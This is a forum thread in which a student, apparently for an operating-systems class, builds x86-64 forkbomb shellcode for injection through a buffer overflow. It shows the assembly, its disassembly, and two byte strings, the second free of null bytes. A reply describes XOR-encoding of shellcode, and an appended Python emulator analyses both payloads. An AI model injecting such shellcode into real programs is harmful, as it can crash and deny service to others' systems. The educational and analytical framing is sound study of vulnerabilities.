Overclock.net › Forums › Software, Programming and Coding › Coding and Programming › [ASM / C ] Forkbomb Shellcode

[ASM / C ] Forkbomb Shellcode

post #1 of 4
Thread Starter 
This is for school, Operating Systems class (studying vulnerabilities). So no, don't be scared, I won't be bothering people with it.


Basically doing a shellcode for a forkbomb program to introduce via a buffer overflow into a target program.

ASM Code:
Code:
section .text
global _start
 
_start:
mov rbx,57             ; Fork() is x64 syscall #57
                       ; 'mov reg,reg' is always faster than
                       ; 'mov reg,imm', so we stick the syscall
                       ; index in a register that will not change
                       ; and use it throughout our forkbomb loop
forkbomb:
mov rax,rbx            ; Copy the syscall index to rax
syscall                ; Invoke the system call
jmp short forkbomb     ; ... and do it again, forever

Disassembly via objdump:
Code:
<_start>
0: 48 bb 39 00 00 00 00 mov $0x39, %rbx
7: 00 00 00

<forkbomb>:
a: 48 89 d8 mov %rbx, %rax
d: 0f 05 syscall
f: eb f9 jmp a <forkbomb>

Having that, my shellcode should be:
Code:
\x48\xbb\x39\x00\x00\x00\x00\x00\x00\x00\x48\x89\xd8\x0f\x05\xeb\xf9

However, because I will be using it inside a buffer it shouldn't have nulls in it (else the buffer will null terminate).

My question is, how can I turn those x00 into something so it won't be null terminated? I've read some strange XOR techniques but I honestly don't understand them enough to use them.
post #2 of 4
Thread Starter 
Got the solution. After making my brain mush from all the thinking I decided to send my teacher an email; turns out I was using 64-bit instructions when they aren't necessary.

I'll post my results just in case somebody in a future Google search finds this thread and has the same problem.

Edit: Shellcode turned out as
Code:
\x48\x31\xdb\xb3\x39\x48\x89\xd8\x0f\x05\xeb\xf9

I'll post the assembler instructions later; I don't want my classmates copying me.
Edited by Chris++ - 11/29/11 at 4:13pm
post #3 of 4
You do sometimes have to encode null bytes in shellcode. A common technique is XORing your shellcode with a single byte ahead of time, and then writing shellcode that can XOR that shellcode in-place and then jump to it, without a null byte. Do you know what XOR does?
Edited by Coma - 11/30/11 at 3:17pm
post #4 of 4
Thread Starter 
Yeah, I do understand what XOR does, and that approach seems quite easy, but wouldn't it require finding some bigger buffers to exploit?

The "strange XOR techniques" I was talking about earlier were XORing a couple of registers that I didn't know much about [al] (I'm not that familiar with ASM, even less so in x86-64); turns out they were just a small part of [rbx] that can be addressed individually.

Anyways, I managed to fix it and execute it properly, so now I can forkbomb my PC all day.
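As an added illustration (not code from the thread or its author), here is a small Python decoder/emulator for just the six x86-64 instruction encodings used by the two byte strings posted in posts #1 and #2. It shows where the NUL bytes come from (the 8-byte immediate of `mov rbx,imm64` in the first version), why the `bl` partial-register write discussed above avoids them, and how a triage tool can recognize both versions as a loop around syscall 57; the shellcode constants are copied from the posts, everything else is constructed here.

```python
# Added analysis example (not code from the thread): a minimal decoder/emulator for the six
# x86-64 encodings used in the two posted shellcodes. It reports embedded NUL bytes and
# whether a syscall is reached inside a loop with rax == 57, i.e. a fork loop.
SYS_FORK = 57

# The two byte strings exactly as posted: post #1 (with NULs) and post #2 (without).
SHELLCODE_V1 = bytes.fromhex("48bb39000000000000004889d80f05ebf9")
SHELLCODE_V2 = bytes.fromhex("4831dbb3394889d80f05ebf9")


def decode(code, ip):
    """Decode one instruction at offset ip -> (mnemonic, operand, length), or None."""
    b = code[ip:] if ip >= 0 else b""
    if b[:2] == b"\x48\xbb" and len(b) >= 10:   # mov rbx, imm64: 8-byte immediate, hence the NULs
        return "mov rbx,imm64", int.from_bytes(b[2:10], "little"), 10
    if b[:3] == b"\x48\x31\xdb":                # xor rbx, rbx
        return "xor rbx,rbx", None, 3
    if b[:1] == b"\xb3" and len(b) >= 2:        # mov bl, imm8: writes only the low byte of rbx
        return "mov bl,imm8", b[1], 2
    if b[:3] == b"\x48\x89\xd8":                # mov rax, rbx
        return "mov rax,rbx", None, 3
    if b[:2] == b"\x0f\x05":                    # syscall
        return "syscall", None, 2
    if b[:1] == b"\xeb" and len(b) >= 2:        # jmp short rel8, signed displacement
        return "jmp short", b[1] - 256 if b[1] >= 128 else b[1], 2
    return None                                  # unknown opcode or end of buffer: stop emulating


def analyze(code, max_steps=64):
    """Emulate from offset 0 until an unknown opcode, the end of the buffer, or a revisited offset."""
    rax = rbx = 0
    ip, seen, syscalls, looped = 0, set(), [], False
    for _ in range(max_steps):
        if ip in seen:                  # control flow came back: an unconditional loop
            looped = True
            break
        seen.add(ip)
        ins = decode(code, ip)
        if ins is None:
            break
        op, arg, size = ins
        if op == "mov rbx,imm64":  rbx = arg
        elif op == "xor rbx,rbx":  rbx = 0
        elif op == "mov bl,imm8":  rbx = (rbx & ~0xFF) | arg
        elif op == "mov rax,rbx":  rax = rbx
        elif op == "syscall":      syscalls.append(rax)
        ip += size + (arg if op == "jmp short" else 0)
    return {"nul_offsets": [i for i, v in enumerate(code) if v == 0],
            "syscalls": syscalls, "fork_loop": looped and SYS_FORK in syscalls}
```

Both strings come out as `fork_loop: True`; the first additionally reports NUL bytes at offsets 3 through 9, the second none.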